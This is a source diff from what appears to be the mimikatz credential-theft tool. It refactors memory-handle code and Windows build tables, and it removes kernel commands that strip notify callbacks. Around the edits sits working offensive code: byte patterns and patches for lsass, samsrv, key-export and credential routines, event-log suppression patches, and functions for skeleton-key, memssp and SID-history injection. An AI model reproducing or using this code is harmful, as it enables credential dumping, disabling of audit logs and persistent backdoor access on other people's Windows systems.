aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{K_CPExportKey, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, 0}, NULL};
|
||||
PKULL_M_PATCH_GENERIC currentReference4001, currentReference4000;
|
||||
|
||||
currentReference4001 = kull_m_patch_getGenericFromBuild(Capi4001References, ARRAYSIZE(Capi4001References), MIMIKATZ_NT_BUILD_NUMBER);
|
||||
@ -928,7 +927,7 @@ NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[])
|
||||
aPattern4000Memory.address = currentReference4000->Search.Pattern;
|
||||
aPatchMemory.address = currentReference4001->Patch.Pattern;
|
||||
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&hLocalMemory, L"rsaenh.dll", &iModuleRsaEnh))
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&KULL_M_MEMORY_GLOBAL_OWN_HANDLE, L"rsaenh.dll", &iModuleRsaEnh))
|
||||
{
|
||||
sMemory.kull_m_memoryRange.size = iModuleRsaEnh.SizeOfImage - ((PBYTE) K_CPExportKey - (PBYTE) iModuleRsaEnh.DllBase.address);
|
||||
|
||||
@ -964,7 +963,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
|
||||
|
||||
@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNT5_PerformWriteRequest), PTRN_WNT5_PerformWriteRequest}, {sizeof(PATC_WNT5_PerformWriteRequest), PATC_WNT5_PerformWriteRequest}, {-10}},
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_Channel__ActualProcessEvent), PTRN_WN60_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_Channel__ActualProcessEvent), PTRN_WIN6_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_PerformWriteRequest[] = {0x89, 0x45, 0xe4, 0x8b, 0x7d, 0x08, 0x89, 0x7d};
|
||||
@ -47,7 +47,7 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_Channel__ActualProcessEvent), PTRN_WN61_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_Channel__ActualProcessEvent), PTRN_WN62_Channel__ActualProcessEvent}, {sizeof(PATC_WIN8_Channel__ActualProcessEvent), PATC_WIN8_Channel__ActualProcessEvent}, {-33}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_Channel__ActualProcessEvent), PTRN_WN63_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-32}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
};
|
||||
#endif
|
||||
|
||||
|
||||
@ -21,8 +21,6 @@ const KUHL_K_C kuhl_k_c_kernel[] = {
|
||||
{NULL, IOCTL_MIMIDRV_NOTIFY_IMAGE_LIST, L"notifImage", L"List image notify callbacks"},
|
||||
{NULL, IOCTL_MIMIDRV_NOTIFY_REG_LIST, L"notifReg", L"List registry notify callbacks"},
|
||||
{NULL, IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST, L"notifObject", L"List object notify callbacks"},
|
||||
{kuhl_m_kernel_notifyProcessRemove, IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE,L"notifProcessRemove", L"Remove process notify callback"},
|
||||
{kuhl_m_kernel_notifyObjectRemove, IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE, L"notifObjectRemove", L"Remove object notify callback"},
|
||||
{NULL, IOCTL_MIMIDRV_FILTER_LIST, L"filters", L"List FS filters"},
|
||||
{NULL, IOCTL_MIMIDRV_MINIFILTER_LIST, L"minifilters", L"List minifilters"},
|
||||
{kuhl_m_kernel_sysenv_set, 0, L"sysenvset", L"System Environment Variable Set"},
|
||||
@ -243,7 +241,6 @@ NTSTATUS kuhl_m_kernel_processToken(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
|
||||
NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[])
|
||||
{
|
||||
PCWCHAR szPid;
|
||||
@ -256,33 +253,6 @@ NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_notifyProcessRemove(int argc, wchar_t * argv[])
|
||||
{
|
||||
return kuhl_m_kernel_notifyGenericRemove(argc, argv, IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE);
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_notifyObjectRemove(int argc, wchar_t * argv[])
|
||||
{
|
||||
return kuhl_m_kernel_notifyGenericRemove(argc, argv, IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE);
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_notifyGenericRemove(int argc, wchar_t * argv[], DWORD code)
|
||||
{
|
||||
PVOID p;
|
||||
if(argc)
|
||||
{
|
||||
#ifdef _M_X64
|
||||
p = (PVOID) _wcstoui64(argv[0], NULL, 0);
|
||||
#else ifdef _M_IX86
|
||||
p = (PVOID) wcstoul(argv[0], NULL, 0);
|
||||
#endif
|
||||
kprintf(L"Target = 0x%p\n", p);
|
||||
kull_m_kernel_mimidrv_simple_output(code, &p, sizeof(PVOID));
|
||||
}
|
||||
else PRINT_ERROR(L"No address?\n");
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[])
|
||||
{
|
||||
NTSTATUS status;
|
||||
|
||||
@ -30,8 +30,5 @@ NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_processProtect(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_processToken(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_notifyProcessRemove(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_notifyObjectRemove(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_notifyGenericRemove(int argc, wchar_t * argv[], DWORD code);
|
||||
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_sysenv_del(int argc, wchar_t * argv[]);
|
||||
@ -976,7 +976,7 @@ KULL_M_PATCH_GENERIC SamSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-12}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
};
|
||||
#endif
|
||||
PCWCHAR szSamSrv = L"samsrv.dll", szLsaSrv = L"lsasrv.dll", szNtDll = L"ntdll.dll", szKernel32 = L"kernel32.dll", szAdvapi32 = L"advapi32.dll";
|
||||
@ -997,10 +997,9 @@ NTSTATUS kuhl_m_lsadump_lsa(int argc, wchar_t * argv[])
|
||||
PDWORD pRid = NULL, pUse = NULL;
|
||||
|
||||
PKULL_M_MEMORY_HANDLE hMemory = NULL;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv;
|
||||
HANDLE hSamSs = NULL;
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
PKULL_M_PATCH_GENERIC currentSamSrvReference;
|
||||
|
||||
@ -1397,9 +1396,8 @@ NTSTATUS kuhl_m_lsadump_trust(int argc, wchar_t * argv[])
|
||||
|
||||
PKULL_M_PATCH_GENERIC currentReference;
|
||||
PKULL_M_MEMORY_HANDLE hMemory = NULL;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule;
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
|
||||
static BOOL isPatching = FALSE;
|
||||
|
||||
@ -32,8 +32,7 @@ NTSTATUS kuhl_m_minesweeper_infos(int argc, wchar_t * argv[])
|
||||
STRUCT_MINESWEEPER_GAME Game;
|
||||
STRUCT_MINESWEEPER_BOARD Board;
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{NULL, NULL}, 0}, NULL};
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {PTRN_WIN6_Game_SafeGetSingleton, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {PTRN_WIN6_Game_SafeGetSingleton, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
BOOL bAlloc = FALSE;
|
||||
LONG offsetTemp = 0;
|
||||
CHAR ** field = NULL;
|
||||
@ -148,8 +147,7 @@ void kuhl_m_minesweeper_infos_parseField(PKULL_M_MEMORY_HANDLE hMemory, PSTRUCT_
|
||||
PSTRUCT_MINESWEEPER_REF_ELEMENT * ref_columns_elements;
|
||||
STRUCT_MINESWEEPER_REF_ELEMENT ref_column_element;
|
||||
DWORD c, r, szFinalElement = isVisible ? sizeof(DWORD) : sizeof(BYTE);
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {base, hMemory}, aLocal = {&ref_first_element, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {base, hMemory}, aLocal = {&ref_first_element, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(kull_m_memory_copy(&aLocal, &aRemote, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT)))
|
||||
{
|
||||
|
||||
@ -69,8 +69,7 @@ PBYTE kuhl_m_misc_detours_testHookDestination(PKULL_M_MEMORY_ADDRESS base, WORD
|
||||
{1, bufferJmpOff, sizeof(bufferJmpOff), sizeof(bufferJmpOff), sizeof(LONG), !(machineOfProcess == IMAGE_FILE_MACHINE_I386), TRUE},
|
||||
{0, bufferRetSS, sizeof(bufferRetSS), sizeof(bufferRetSS), sizeof(PVOID), FALSE, FALSE},
|
||||
};
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer}, dBuffer = {&dst, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, dBuffer = {&dst, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS pBuffer = *base;
|
||||
DWORD i, sizeToRead;
|
||||
|
||||
@ -193,8 +192,7 @@ BOOL kuhl_m_misc_generic_nogpo_patch(PCWSTR commandLine, PWSTR disableString, SI
|
||||
PEB Peb;
|
||||
PROCESS_INFORMATION processInformation;
|
||||
PIMAGE_NT_HEADERS pNtHeaders;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBaseAdress = {NULL, NULL}, aPattern = {disableString, &hLocalMemory}, aPatch = {enableString, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aBaseAdress = {NULL, NULL}, aPattern = {disableString, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatch = {enableString, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
|
||||
if(kull_m_process_create(KULL_M_PROCESS_CREATE_NORMAL, commandLine, CREATE_SUSPENDED, NULL, 0, NULL, NULL, NULL, &processInformation, FALSE))
|
||||
@ -315,8 +313,7 @@ NTSTATUS kuhl_m_misc_addsid(int argc, wchar_t * argv[])
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iNtds;
|
||||
DWORD i, err;
|
||||
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS sAddress = {NULL, &hLocalMemory}, aProcess = {NULL, NULL};
|
||||
KULL_M_MEMORY_ADDRESS sAddress = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess = {NULL, NULL};
|
||||
KULL_M_MEMORY_SEARCH sSearch;
|
||||
BOOL littleSuccess = TRUE;
|
||||
PPOLICY_DNS_DOMAIN_INFO pDnsInfo;
|
||||
@ -367,7 +364,7 @@ NTSTATUS kuhl_m_misc_addsid(int argc, wchar_t * argv[])
|
||||
for(i = 0; (i < pOsSz) && littleSuccess; i++)
|
||||
{
|
||||
littleSuccess = FALSE;
|
||||
pOs[i].LocalBackup.hMemory = &hLocalMemory;
|
||||
pOs[i].LocalBackup.hMemory = &KULL_M_MEMORY_GLOBAL_OWN_HANDLE;
|
||||
pOs[i].LocalBackup.address = NULL;
|
||||
pOs[i].AdressOfPatch.hMemory = aProcess.hMemory;
|
||||
pOs[i].AdressOfPatch.address = NULL;
|
||||
@ -502,8 +499,7 @@ NTSTATUS kuhl_m_misc_memssp(int argc, wchar_t * argv[])
|
||||
{
|
||||
HANDLE hProcess;
|
||||
DWORD processId;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sSearch;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iMSV;
|
||||
PKULL_M_PATCH_GENERIC pGeneric;
|
||||
@ -648,8 +644,7 @@ NTSTATUS kuhl_m_misc_skeleton(int argc, wchar_t * argv[])
|
||||
DWORD processId;
|
||||
HANDLE hProcess;
|
||||
PBYTE localAddr, ptrValue = NULL;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION cryptInfos;
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
LSA_UNICODE_STRING orig;
|
||||
|
||||
@ -14,7 +14,7 @@ BYTE PTRN_WI10_ScSendControl[] = {0x48, 0x8d, 0x6c, 0x24, 0xf9, 0x48, 0x81, 0xe
|
||||
KULL_M_PATCH_GENERIC ScSendControlReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_ScSendControl), PTRN_WN61_ScSendControl}, {0, NULL}, {-26}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_ScSendControl), PTRN_WIN8_ScSendControl}, {0, NULL}, {-21}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {-21}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {-21}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WN61_ScSendControl[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x94, 0x00, 0x00, 0x00, 0x53};
|
||||
@ -24,7 +24,7 @@ BYTE PTRN_WI10_ScSendControl[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xe4, 0xf
|
||||
KULL_M_PATCH_GENERIC ScSendControlReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_ScSendControl), PTRN_WN61_ScSendControl}, {0, NULL}, {0}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_ScSendControl), PTRN_WIN8_ScSendControl}, {0, NULL}, {0}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {0}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -51,8 +51,7 @@ BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
|
||||
PVOID pCode;
|
||||
HANDLE hProcess;
|
||||
KULL_M_MEMORY_ADDRESS aRemoteFunc;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
PKULL_M_PATCH_GENERIC currentReference;
|
||||
PEB Peb;
|
||||
|
||||
@ -383,7 +383,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_WN60_CredpCloneCredential), PTRN_WN60_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_CredpCloneCredential), PTRN_WN62_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x43, 0x04, 0x83, 0xf8, 0x01, 0x74};
|
||||
@ -395,7 +395,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNT5_CredpCloneCredential), PTRN_WNT5_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_WN60_CredpCloneCredential), PTRN_WN60_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_CredpCloneCredential), PTRN_WN62_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {0}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN64_CredpCloneCredential), PTRN_WN64_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_CredpCloneCredential), PTRN_WN64_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {0}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -406,10 +406,9 @@ NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[])
|
||||
DWORD flags = 0;
|
||||
SERVICE_STATUS_PROCESS ServiceStatusProcess;
|
||||
PKULL_M_MEMORY_HANDLE hMemory;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv;
|
||||
HANDLE hSamSs;
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
PKULL_M_PATCH_GENERIC CredpCloneCredentialReference;
|
||||
|
||||
|
||||
@ -35,8 +35,7 @@ PDWORD g_cbRandomKey;
|
||||
NTSTATUS kuhl_m_sekurlsa_nt5_init()
|
||||
{
|
||||
struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable;
|
||||
KULL_M_MEMORY_HANDLE hMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aMemory = {&extractPkgFunctionTable, &hMemory};
|
||||
KULL_M_MEMORY_ADDRESS aMemory = {&extractPkgFunctionTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION vbInfos;
|
||||
DWORD sizeOfSearch = sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY);
|
||||
@ -50,7 +49,7 @@ NTSTATUS kuhl_m_sekurlsa_nt5_init()
|
||||
|
||||
if(kuhl_m_sekurlsa_nt5_hLsasrv)
|
||||
{
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&hMemory, L"lsasrv.dll", &vbInfos))
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&KULL_M_MEMORY_GLOBAL_OWN_HANDLE, L"lsasrv.dll", &vbInfos))
|
||||
{
|
||||
sMemory.kull_m_memoryRange.kull_m_memoryAdress = vbInfos.DllBase;
|
||||
sMemory.kull_m_memoryRange.size = vbInfos.SizeOfImage;
|
||||
@ -129,8 +128,7 @@ NTSTATUS kuhl_m_sekurlsa_nt5_clean()
|
||||
NTSTATUS kuhl_m_sekurlsa_nt5_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule)
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {PTRN_WNT5_LsaInitializeProtectedMemory_KEY, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {PTRN_WNT5_LsaInitializeProtectedMemory_KEY, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{lsassLsaSrvModule->DllBase.address, cLsass->hLsassMem}, lsassLsaSrvModule->SizeOfImage}, NULL};
|
||||
DWORD sizeOfSearch = sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY);
|
||||
LONG offFeedBack = OFFS_WNT5_g_Feedback, offpDESXKey = OFFS_WNT5_g_pDESXKey, offpRandomKey = OFFS_WNT5_g_pRandomKey;
|
||||
@ -179,8 +177,7 @@ NTSTATUS kuhl_m_sekurlsa_nt5_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_
|
||||
BOOL kuhl_m_sekurlsa_nt5_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PBYTE Key, SIZE_T taille)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
